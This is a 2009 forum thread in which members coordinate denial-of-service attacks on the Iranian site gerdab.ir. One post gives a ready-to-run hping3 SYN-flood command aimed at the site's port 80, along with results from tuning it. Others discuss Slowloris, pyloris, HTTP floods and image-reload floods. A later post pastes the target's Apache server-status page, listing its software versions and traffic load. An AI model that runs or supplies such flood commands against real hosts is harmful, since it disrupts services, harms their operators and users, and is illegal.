Customize

Moar Gerdab shite

Discussion in 'Help Iran Online' started by Srpska, Jul 12, 2009.

1. Srpska Member

OK, do we actually have any means of moving the fight against Gerdab on/up? It's been active for some time now, since it went into some kind of srs bznss lockdown mode.

I know about the email spam, but if it's at all possible to deactivate the site itself we need to do so. I don't need to remind you of why.

Nedasites and Slowloris are being blocked; someone mentioned that an HTTP flood might work. Any further info on this?
  2. I've been running hping3 for the past 12 hours or so in Ubuntu:

hping3 gerdab.ir -p 80 -i u30000 -S

This yields a steady 3.5 kib/s out and 1.9 kib/s in returning ACKs. After some fooling around with various options in pyloris and slow loris I settled on this as my best current bet, but I'm no expert. Seems like the slow loris attacks are initially potent but after a while gerdab stops acknowledging. Which would be great if it stopped responding because the server had been reduced to a smoldering heap but that's obviously not the case :)

If anyone has better ideas or a more useful analysis, I'd be grateful to hear it.
  3. Ray Murphy Member

I'm still waiting to hear if there is any value in reloading all the pictures, instead of just updating a minimal amount of data.
  4. Apache Server Status for gerdab.ir

Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8
    Server Built: May 28 2009 12:50:07

Current Time: Monday, 13-Jul-2009 16:57:30 IRDT
    Restart Time: Sunday, 12-Jul-2009 04:02:36 IRDT
    Parent Server Generation: 1
    Server uptime: 1 day 12 hours 54 minutes 54 seconds
    Total accesses: 9332337 - Total Traffic: 288.4 GB
    CPU Usage: u679.32 s293.37 cu5591.92 cs0 - 4.94% CPU load
    70.2 requests/sec - 2.2 MB/second - 32.4 kB/request
    56 requests currently being processed, 78 idle workers